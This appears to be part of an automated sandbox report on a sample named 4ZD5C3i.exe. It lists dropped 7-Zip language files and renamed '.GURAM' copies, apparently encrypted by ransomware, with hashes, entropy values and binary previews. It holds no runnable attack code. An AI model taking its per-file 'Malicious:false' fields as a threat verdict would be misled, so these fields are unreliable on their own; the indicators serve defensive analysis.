                                                                                                                                                                                                                                                Preview:...U.f.M..0o.#.my,..FX..GA..V.&.gg._.R.!r.C>-..1.......{.0.e..m....&...d..hr....n..SUL5.03..)....;.mV..v.X.R....<^cL..g>[.......0HUQ.vZC./r...(E2.........F........e>.o..po.Q;..+..f.a.gK..qk..e|6t{.4T.;X>%D...#.S...)..7......V*7..PQ2........"..5...ob..n~....%c\....@..F+.D.u...[..?4..".L?.]'.@.L(z..nq#%./2..CJ......._..zg....".WH......"..w{.h"......U?.....k.....|..@.....(jM..L..6p.....V/w..>.o.$.m.......1.`0N..p,d...e7..r..h..9..h..NR.v=..4L;.\o..y.F.0p.V...A.E....Gp(...:|..Z,.<..l./T...3K..G.m>.az>`.ge..w(...V .{.#.*._.1.J%.....L:.k.nb.F...u...7..'=.}..0..?...y..%k..w.u.e.0...h+t...{X........g.Cu:.....$.....5H..x.4.......6.l..%..F..uk..W ..F..u..|.*B....3..IW....6T....zy`..-...r.......4..#..@.'."b...l. .4...MN>...._....D.<\?....qQ. .E;...2^.[.|.....J....vz.jA..H2....'\..zq_......d....c..!$.&.3..P...>......~.Y..G;......E.M....G..T.k:..o..).+.9Up:..P9o.VY ..;W~...H./0=.i`Z.....]. ..8.S.m...K.<...?.........p..=..........[r9S.(..].m.I

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ko.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10897
                                                                                                                                                                                                                                                Entropy (8bit):7.980915754394958
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:9ZlXThSQKP33dg2DrXOMCh31ZfmUqjVkzMalM5ecsKjO1bKt5CFVxQoSUQH:HhTh+3NdPObh31DgUMal6ecrjO1g5CDg
                                                                                                                                                                                                                                                MD5:CDDB038085D858AB9AAFC05E5EE0DCA1
                                                                                                                                                                                                                                                SHA1:84773548CADEE47E2D83960014AD1B39E881C4F0
                                                                                                                                                                                                                                                SHA-256:4BDC106E1956F8C610B2D3D96094687D619C67711EF0728FBC084D690C80D89A
                                                                                                                                                                                                                                                SHA-512:E4EBA37D84AA38C46704FDB892051172493F464D3A2B09A3FD9951B9A864488DA33B24EF30898CDFC14B2E7FC4EAF5F3ABAEFB54E0AE6F3F0224532AC69FBB07
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..+.^..[."......&*P.^.(.=.]\...!....]...8K,.B..S!+w..#!.?_?u...h..G".$...rq.S2YhR.|N.G.B.....A.F...]..g..........(.......8......C...UN.=....tJ......].F..+k...a.@..1G..5._.....8f......8FM.])\.y.....x.......c.g....=.G(.:...?2..7...9...uw.\.8+...kr_c..h.ur....t.Ct...'e. >inL.-....agn....r..6.QN.T.yk.%.:.|.%.C.S#..;..L.....~...X+/S.h.. m.......#L.t.BU..S..J.&(.59....gi.U<.e..85.p........W.I...G_.;..V....)@.us{...H6......_f.._v.... .[..x.t...1....1.>.:.m...X.Z8._..,.6...Z..a...v.........@#A..k+.2....._."..X....!l.)F.....PP..4.._..<..._(&... 8.....h......h.sD.)..i.]...G*..0..]&.......3.........Q."..}.O..)w..1.?j...dR+.ZqOO.o.5.....mn....6..Cc....~..\..L.n.w......,G...f9.z..)..%.......P.Q.0...))..C..a~...Z.&.P.M..H)m..^.}.)..z. E......lJu.:.......".NO....2......1.(....D...t.N......8@.......xQ.....]..b.:.v...M.v......,..s....wd....,....d....Y.B&...qk.......)....TVjZ!....Yqg^..._,du.....0+....v+.xzF.."...p...iC%v.P.4p...#..N....r2b..W7...el...>.\?[(..X

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ko.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10897
                                                                                                                                                                                                                                                Entropy (8bit):7.980915754394958
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:9ZlXThSQKP33dg2DrXOMCh31ZfmUqjVkzMalM5ecsKjO1bKt5CFVxQoSUQH:HhTh+3NdPObh31DgUMal6ecrjO1g5CDg
                                                                                                                                                                                                                                                MD5:CDDB038085D858AB9AAFC05E5EE0DCA1
                                                                                                                                                                                                                                                SHA1:84773548CADEE47E2D83960014AD1B39E881C4F0
                                                                                                                                                                                                                                                SHA-256:4BDC106E1956F8C610B2D3D96094687D619C67711EF0728FBC084D690C80D89A
                                                                                                                                                                                                                                                SHA-512:E4EBA37D84AA38C46704FDB892051172493F464D3A2B09A3FD9951B9A864488DA33B24EF30898CDFC14B2E7FC4EAF5F3ABAEFB54E0AE6F3F0224532AC69FBB07
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..+.^..[."......&*P.^.(.=.]\...!....]...8K,.B..S!+w..#!.?_?u...h..G".$...rq.S2YhR.|N.G.B.....A.F...]..g..........(.......8......C...UN.=....tJ......].F..+k...a.@..1G..5._.....8f......8FM.])\.y.....x.......c.g....=.G(.:...?2..7...9...uw.\.8+...kr_c..h.ur....t.Ct...'e. >inL.-....agn....r..6.QN.T.yk.%.:.|.%.C.S#..;..L.....~...X+/S.h.. m.......#L.t.BU..S..J.&(.59....gi.U<.e..85.p........W.I...G_.;..V....)@.us{...H6......_f.._v.... .[..x.t...1....1.>.:.m...X.Z8._..,.6...Z..a...v.........@#A..k+.2....._."..X....!l.)F.....PP..4.._..<..._(&... 8.....h......h.sD.)..i.]...G*..0..]&.......3.........Q."..}.O..)w..1.?j...dR+.ZqOO.o.5.....mn....6..Cc....~..\..L.n.w......,G...f9.z..)..%.......P.Q.0...))..C..a~...Z.&.P.M..H)m..^.}.)..z. E......lJu.:.......".NO....2......1.(....D...t.N......8@.......xQ.....]..b.:.v...M.v......,..s....wd....,....d....Y.B&...qk.......)....TVjZ!....Yqg^..._,du.....0+....v+.xzF.."...p...iC%v.P.4p...#..N....r2b..W7...el...>.\?[(..X

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ku-ckb.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12945
                                                                                                                                                                                                                                                Entropy (8bit):7.9866167906449
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:gEgXcF1K94To4kGjKAmthWFy7QQy514weQXARMJdKQA2AlO8UhA5Zjee78HZYa1n:gLXUTINAiYudyjleQQt4ujjeeJ+k+FD5
                                                                                                                                                                                                                                                MD5:E0437C0FFD1CCB5A3E3113AAB19F8DAB
                                                                                                                                                                                                                                                SHA1:7D5B0214170B4B08A5198D31D9412F05EBBEA25E
                                                                                                                                                                                                                                                SHA-256:D99C8B50DBE96069ACC66D2A55266F7B6D912BCE2D2BBF94F3288D4B5CB28F98
                                                                                                                                                                                                                                                SHA-512:5AFD69AA068D128717016B0668CA382A5698B888E6D1B5A7379AB052A85CAF3922A7F1F74A1ED9FB82761713C81371AD6B8E7E71DF2298DE6BDD88F208831D27
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.......\2l.".....7../OE{..{.{'...lT]6.."3:7}.....6V..GK8d.l1..y.#:..S.......>....,....W..b..x^.F..).sYO..u.%X..}[z..7....,Y.P.)1.V.....".W...X.6......1.....l.h...i..CJ.(~.2..t.......R>...lp.....A.zM>.\$D.r..^T.5..Bb:|.X...X.'o...9 ...U....\..u.$w..>...aR.<1Fpy..Xc.|..P.iJ.%.....E.S..!d....r...eh...!3.....2.!<..o.K.n(2.=.p!.Q....:iC.B..B.o...T_.._...P...!......1]Z...",..+..3d........?P.......MHJ...dt...]. .L6....G.*O ..}...3hL.....3N.#T. ...2...p#f. ..5.h.N..I....v`>>.G.d...C@._.R1jk.p\`[._...!...X..V%..o.%y...z.A....2.q.....4}.{K.O.....C].../L..y2...]rj.......^0.h<s.{..Y......&.eW..Z..O...GR.....Q..........."i.B.fn....<3..k.?..})?K.l.&..r........v.sr+.mN{pz..........qi....Z,.........%3O.rl.....8..Cj..#.fD....+1....-....lb...)J...r...A..g......(.Ic#.../'q.N..l6Ok..4?.A..?.....t.7.-..)..vTt...v.x.u....A..j!.......].Q...+....Q=S..}.-.........iK...X...2^M...C5.T...DR..G...."...%k.o~..lA..9...(.....6.}.!.'...$d..........0.E..M=.pEt;Z.>

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ku-ckb.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12945
                                                                                                                                                                                                                                                Entropy (8bit):7.9866167906449
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:gEgXcF1K94To4kGjKAmthWFy7QQy514weQXARMJdKQA2AlO8UhA5Zjee78HZYa1n:gLXUTINAiYudyjleQQt4ujjeeJ+k+FD5
                                                                                                                                                                                                                                                MD5:E0437C0FFD1CCB5A3E3113AAB19F8DAB
                                                                                                                                                                                                                                                SHA1:7D5B0214170B4B08A5198D31D9412F05EBBEA25E
                                                                                                                                                                                                                                                SHA-256:D99C8B50DBE96069ACC66D2A55266F7B6D912BCE2D2BBF94F3288D4B5CB28F98
                                                                                                                                                                                                                                                SHA-512:5AFD69AA068D128717016B0668CA382A5698B888E6D1B5A7379AB052A85CAF3922A7F1F74A1ED9FB82761713C81371AD6B8E7E71DF2298DE6BDD88F208831D27
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.......\2l.".....7../OE{..{.{'...lT]6.."3:7}.....6V..GK8d.l1..y.#:..S.......>....,....W..b..x^.F..).sYO..u.%X..}[z..7....,Y.P.)1.V.....".W...X.6......1.....l.h...i..CJ.(~.2..t.......R>...lp.....A.zM>.\$D.r..^T.5..Bb:|.X...X.'o...9 ...U....\..u.$w..>...aR.<1Fpy..Xc.|..P.iJ.%.....E.S..!d....r...eh...!3.....2.!<..o.K.n(2.=.p!.Q....:iC.B..B.o...T_.._...P...!......1]Z...",..+..3d........?P.......MHJ...dt...]. .L6....G.*O ..}...3hL.....3N.#T. ...2...p#f. ..5.h.N..I....v`>>.G.d...C@._.R1jk.p\`[._...!...X..V%..o.%y...z.A....2.q.....4}.{K.O.....C].../L..y2...]rj.......^0.h<s.{..Y......&.eW..Z..O...GR.....Q..........."i.B.fn....<3..k.?..})?K.l.&..r........v.sr+.mN{pz..........qi....Z,.........%3O.rl.....8..Cj..#.fD....+1....-....lb...)J...r...A..g......(.Ic#.../'q.N..l6Ok..4?.A..?.....t.7.-..)..vTt...v.x.u....A..j!.......].Q...+....Q=S..}.-.........iK...X...2^M...C5.T...DR..G...."...%k.o~..lA..9...(.....6.}.!.'...$d..........0.E..M=.pEt;Z.>

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ku.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):6382
                                                                                                                                                                                                                                                Entropy (8bit):7.972495717622828
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:gzLP67vAbyFHWqgTNhG2ErWRq+UsPFyvUf:6yvpFHuhCG/U6Fysf
                                                                                                                                                                                                                                                MD5:EE7187F12D909E0C69DA5A7BC9F6AD6D
                                                                                                                                                                                                                                                SHA1:7885A66F506A3C52D5F9D9BDFF666DFC27342095
                                                                                                                                                                                                                                                SHA-256:89901DDB11009202250AB7EB0B846388CBE8729FF2CFB90173BCD1DE565056C0
                                                                                                                                                                                                                                                SHA-512:2059028BF5CE2B0BC8DCEC4A5BF845E4213FCF64ED290FEE910550FAA4C4BFD849922FCE2BECB6296DA19AB9FA366858EDA205C6B468F753067A5F2DE89D967A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Fz+Vk.KE\..%.&...U...iOK.5...).#.Z..7...b..#Y7.c...o...X....;B.m..<%..W(S#.x...c.n...9..`..i..<..-86LZ.r...........7.j).eU.........5[.I....].....}oTv......_F...w.P.x)K.n...V..:.=O.V.&,..t......l+.<.wd.Mn.x....~.jGq...ji..?..DG.....5..$.|.n}4.N.r..p..;1+..c......... .[.?.G....>.L.cS..US..n.X ......[u...$w.AhV5.Y6d0.c8E.....$k(.3..c.m.o.'..Em.T.U.....v.X...1..I...!X.....1p...P..p?g4.v...d.......@Sf....n..19_L..5....NF|TqG8..0.0t.\M.O.;I.@.....H3....7...6...:...t...j......e.^.....E...N../.n...B.[z...r......?......c.`...Y....@8....&j..[....lN_.&._Z.uR[#`#&...........6/....q)e..xA...Qi..=...4.n....4.Qu.1l.....k..Qg.p{...`....}....QEI.C........RQ....?.....G..yQU...g..R. ..D..........m..x..q.4.u....F...m..d.g}9....\k`0.....).....D..%.X.(Pa<#.:.h.`.i/....u..4-V8......*.F..?.1./.v....Zq(.5JW+M....j.uYtw.q.dOzQ.C.]ZO.Uh..q)Z.......0...P.B..*F#..'.{9.....~)=.m..+OA)N........&.&.j...Bd..)...}X.c.(.../.n.._{@.W..:.s..k..6bG.2,|..-.H.l.&.`R......51..r....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ku.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):6382
                                                                                                                                                                                                                                                Entropy (8bit):7.972495717622828
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:gzLP67vAbyFHWqgTNhG2ErWRq+UsPFyvUf:6yvpFHuhCG/U6Fysf
                                                                                                                                                                                                                                                MD5:EE7187F12D909E0C69DA5A7BC9F6AD6D
                                                                                                                                                                                                                                                SHA1:7885A66F506A3C52D5F9D9BDFF666DFC27342095
                                                                                                                                                                                                                                                SHA-256:89901DDB11009202250AB7EB0B846388CBE8729FF2CFB90173BCD1DE565056C0
                                                                                                                                                                                                                                                SHA-512:2059028BF5CE2B0BC8DCEC4A5BF845E4213FCF64ED290FEE910550FAA4C4BFD849922FCE2BECB6296DA19AB9FA366858EDA205C6B468F753067A5F2DE89D967A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Fz+Vk.KE\..%.&...U...iOK.5...).#.Z..7...b..#Y7.c...o...X....;B.m..<%..W(S#.x...c.n...9..`..i..<..-86LZ.r...........7.j).eU.........5[.I....].....}oTv......_F...w.P.x)K.n...V..:.=O.V.&,..t......l+.<.wd.Mn.x....~.jGq...ji..?..DG.....5..$.|.n}4.N.r..p..;1+..c......... .[.?.G....>.L.cS..US..n.X ......[u...$w.AhV5.Y6d0.c8E.....$k(.3..c.m.o.'..Em.T.U.....v.X...1..I...!X.....1p...P..p?g4.v...d.......@Sf....n..19_L..5....NF|TqG8..0.0t.\M.O.;I.@.....H3....7...6...:...t...j......e.^.....E...N../.n...B.[z...r......?......c.`...Y....@8....&j..[....lN_.&._Z.uR[#`#&...........6/....q)e..xA...Qi..=...4.n....4.Qu.1l.....k..Qg.p{...`....}....QEI.C........RQ....?.....G..yQU...g..R. ..D..........m..x..q.4.u....F...m..d.g}9....\k`0.....).....D..%.X.(Pa<#.:.h.`.i/....u..4-V8......*.F..?.1./.v....Zq(.5JW+M....j.uYtw.q.dOzQ.C.]ZO.Uh..q)Z.......0...P.B..*F#..'.{9.....~)=.m..+OA)N........&.&.j...Bd..)...}X.c.(.../.n.._{@.W..:.s..k..6bG.2,|..-.H.l.&.`R......51..r....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ky.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13064
                                                                                                                                                                                                                                                Entropy (8bit):7.984871974800753
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:sro+dHM1JI+MI+z2Z4iSYWYqma0Kaed24BuN32+60a:2omHeJIz9G4iNqDLdLC60a
                                                                                                                                                                                                                                                MD5:C48B14F7948C310DB057218DA1715E27
                                                                                                                                                                                                                                                SHA1:C00099709D97F0715BD0FD4B02E743A5A11EC039
                                                                                                                                                                                                                                                SHA-256:9BC501A0A86A5D341B771FBA4825A1D92BEC7025BB833801CE833C8A2ADD1BC6
                                                                                                                                                                                                                                                SHA-512:58BE5796EAC87CC96D1D20415A0A75137F3EAF0D9D97A56E7B949A6308447DF6E162DEDD5B63F75590C30217C42658B64BF175646B61D33EEFC0A4B49D85109F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:>....ZY...0?...'.:..yg.FRL@A......c5h.. ...L...Qc..pB.... r.=..-.@...+^......o....O5y..p..eeAv........F...,\zW..IU?.....o.[.Nr.a......11.:..b..._.ZW..%....}%.>U...(.p....@...2M..N.*....xsKjt....o...iH.u..'X..}E.._.6..|d..W.}... A.y.aEM..3RP.>...O...`oL.EGF...4.s.C}[qpN.7.......&X.Ed.2.%....iS..&VI.]O'.v.+v._I.FS.p..Z..........q>..`.../..._.v:.D8......Q........Go-.....2.n..,.VG.G.......i..?...3.{...n-..:.|ri+...9&4.Y..7.....g.1..E.v...Z...x].....s...I..j.'.%z`..-.....s`..Y... .}(..&r.qJ>.*.m....2w~..S...7....R.o5.o...]..YKu.*..S.J..*W}o.g.98.0XMs+......\.@8.|.O....^.@.Zv....g...B.k....v...&..uN...g.]f..U.P...O.G.L.X0'.!kQ.n.G.9..p....:.T...S..W.v.......^l[`..{p.J..!.qw...u/....]7...0R#.g....*.$........./m..?Rzz.N..9.,L../iE.....S..,...Z.m.....,.MCR.v.6V..D.s).X.U.\/8.@k-.n.\.[........Rh.;v.TrQ.Yh..E..R\=..D.o..AQF.XS.=.....^.....;o6}=`Y..t0....O.{.m.z.Y.G..X.....s....P/...?]s..g.\=e..4...Q....Ez../....8..oV%.#..91.._!.v....FBM..q.Y

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ky.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13064
                                                                                                                                                                                                                                                Entropy (8bit):7.984871974800753
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:sro+dHM1JI+MI+z2Z4iSYWYqma0Kaed24BuN32+60a:2omHeJIz9G4iNqDLdLC60a
                                                                                                                                                                                                                                                MD5:C48B14F7948C310DB057218DA1715E27
                                                                                                                                                                                                                                                SHA1:C00099709D97F0715BD0FD4B02E743A5A11EC039
                                                                                                                                                                                                                                                SHA-256:9BC501A0A86A5D341B771FBA4825A1D92BEC7025BB833801CE833C8A2ADD1BC6
                                                                                                                                                                                                                                                SHA-512:58BE5796EAC87CC96D1D20415A0A75137F3EAF0D9D97A56E7B949A6308447DF6E162DEDD5B63F75590C30217C42658B64BF175646B61D33EEFC0A4B49D85109F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:>....ZY...0?...'.:..yg.FRL@A......c5h.. ...L...Qc..pB.... r.=..-.@...+^......o....O5y..p..eeAv........F...,\zW..IU?.....o.[.Nr.a......11.:..b..._.ZW..%....}%.>U...(.p....@...2M..N.*....xsKjt....o...iH.u..'X..}E.._.6..|d..W.}... A.y.aEM..3RP.>...O...`oL.EGF...4.s.C}[qpN.7.......&X.Ed.2.%....iS..&VI.]O'.v.+v._I.FS.p..Z..........q>..`.../..._.v:.D8......Q........Go-.....2.n..,.VG.G.......i..?...3.{...n-..:.|ri+...9&4.Y..7.....g.1..E.v...Z...x].....s...I..j.'.%z`..-.....s`..Y... .}(..&r.qJ>.*.m....2w~..S...7....R.o5.o...]..YKu.*..S.J..*W}o.g.98.0XMs+......\.@8.|.O....^.@.Zv....g...B.k....v...&..uN...g.]f..U.P...O.G.L.X0'.!kQ.n.G.9..p....:.T...S..W.v.......^l[`..{p.J..!.qw...u/....]7...0R#.g....*.$........./m..?Rzz.N..9.,L../iE.....S..,...Z.m.....,.MCR.v.6V..D.s).X.U.\/8.@k-.n.\.[........Rh.;v.TrQ.Yh..E..R\=..D.o..AQF.XS.=.....^.....;o6}=`Y..t0....O.{.m.z.Y.G..X.....s....P/...?]s..g.\=e..4...Q....Ez../....8..oV%.#..91.._!.v....FBM..q.Y

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\lij.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8483
                                                                                                                                                                                                                                                Entropy (8bit):7.978110233448817
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:rcAAF5MV8lpKFX+/z35CMIFQb5Kgu3uPcUHRz3bLabVSfD+4C9gqU+:oAAF528yCz3cMDbQgu+1mILo2+
                                                                                                                                                                                                                                                MD5:049E833E2672219950FA5B0CE7EA4EE4
                                                                                                                                                                                                                                                SHA1:2A8563C583AAAB3A654EC3BEC128F1191A20349D
                                                                                                                                                                                                                                                SHA-256:520A0A7C63D958EB610DAC0ED16929297FC7E934AA4E50D39000D4E5669B08DD
                                                                                                                                                                                                                                                SHA-512:1DF4DCFB5BFD9AEFDDA8BECA6AC71D2902E5B993EB30D459755A5BA894824677A2B41F7B1223F02D56F418EA4412023C0B395A4BB87BB87320852B009F60A29D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.o....`.......p.{..._...pF..1U....1......./Y::...L..K..|k...s.[. ..~'.......M."..P.J.z.+.h..#s.....N...d..\..|k35.j..[`....M....TdU..._..c..8.......L.J.9..":oR.S.v.nH..0..F.............A.A..A2T,c....qA}..[s.<]v.b=@.}....:R.U..e8......^FT.hJ.uQ.P.Ka..@..b..S.......^.2...Z..l.(.!......]T@.K......|.'.X..(M)..&q|..~..x!w..(.c..|..~..~.......{...k..`a.m.......[.%Z...kPn.G....Lb1FCzM.O;....@.X.!...ZE..r.l..PD.O.B.M4.+.z.h;.t..^.~D.d+2..I.4....LE...{.2..(..:.^..V..Y%..R....T.t%..`V..8...jd[.....4......Z.L....*....R......x.<.<..)fy^.U..N.n<...+/..m.y{{.W_..jf|`..R.|....`6j.......E.o...).......=...R......7.<;.To.R...>.Gs.e.k.1.`..p...:.......{[.o)....]......{...YVh......0.....*U ..+t9m_:......T..).u..8.H.naX.{?..b <...F..j.|....o...4.Kz.F.....G.|.s.R..*pZ.K.-.~C....+x.".....s."X.J..K...f|..K.....y&.>.Q.Q\.}.....}...._../$..@..;./....fb.K...>.H...f.Qf...We.V...6G..}..a.J..M..#..+F.w$^....{.a..3..'.{q.....;......<..7(..?.....8....:....t....#p.H.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\lij.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8483
                                                                                                                                                                                                                                                Entropy (8bit):7.978110233448817
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:rcAAF5MV8lpKFX+/z35CMIFQb5Kgu3uPcUHRz3bLabVSfD+4C9gqU+:oAAF528yCz3cMDbQgu+1mILo2+
                                                                                                                                                                                                                                                MD5:049E833E2672219950FA5B0CE7EA4EE4
                                                                                                                                                                                                                                                SHA1:2A8563C583AAAB3A654EC3BEC128F1191A20349D
                                                                                                                                                                                                                                                SHA-256:520A0A7C63D958EB610DAC0ED16929297FC7E934AA4E50D39000D4E5669B08DD
                                                                                                                                                                                                                                                SHA-512:1DF4DCFB5BFD9AEFDDA8BECA6AC71D2902E5B993EB30D459755A5BA894824677A2B41F7B1223F02D56F418EA4412023C0B395A4BB87BB87320852B009F60A29D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.o....`.......p.{..._...pF..1U....1......./Y::...L..K..|k...s.[. ..~'.......M."..P.J.z.+.h..#s.....N...d..\..|k35.j..[`....M....TdU..._..c..8.......L.J.9..":oR.S.v.nH..0..F.............A.A..A2T,c....qA}..[s.<]v.b=@.}....:R.U..e8......^FT.hJ.uQ.P.Ka..@..b..S.......^.2...Z..l.(.!......]T@.K......|.'.X..(M)..&q|..~..x!w..(.c..|..~..~.......{...k..`a.m.......[.%Z...kPn.G....Lb1FCzM.O;....@.X.!...ZE..r.l..PD.O.B.M4.+.z.h;.t..^.~D.d+2..I.4....LE...{.2..(..:.^..V..Y%..R....T.t%..`V..8...jd[.....4......Z.L....*....R......x.<.<..)fy^.U..N.n<...+/..m.y{{.W_..jf|`..R.|....`6j.......E.o...).......=...R......7.<;.To.R...>.Gs.e.k.1.`..p...:.......{[.o)....]......{...YVh......0.....*U ..+t9m_:......T..).u..8.H.naX.{?..b <...F..j.|....o...4.Kz.F.....G.|.s.R..*pZ.K.-.~C....+x.".....s."X.J..K...f|..K.....y&.>.Q.Q\.}.....}...._../$..@..;./....fb.K...>.H...f.Qf...We.V...6G..}..a.J..M..#..+F.w$^....{.a..3..'.{q.....;......<..7(..?.....8....:....t....#p.H.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\lt.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10133
                                                                                                                                                                                                                                                Entropy (8bit):7.983150177690685
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:jtePG+llBbONy+7v7MBfEVoGaV5ev8GmCmxhnbUtfC26G3Ht3K75dvJ8UyPq:jt1oSNRTAmvuhbo626G3Ht38jBTJ
                                                                                                                                                                                                                                                MD5:F3860BA817DC862FDF4310B571EE2A7B
                                                                                                                                                                                                                                                SHA1:2370AB2D824E2E3D215FCB022F387C5DF4774502
                                                                                                                                                                                                                                                SHA-256:1C1CA0E6495E153623A7DD58E64C027ECBF14E586C8A5562930B4A06E435EEA9
                                                                                                                                                                                                                                                SHA-512:A8005BE14FBA46FBD283792542FB69DB494FF2C8437CC257865EBA11A93773004F8BCCD371B34F36AB28A6F2D12F64C5BF6E4AB50ECF482968394499CBB3CC90
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
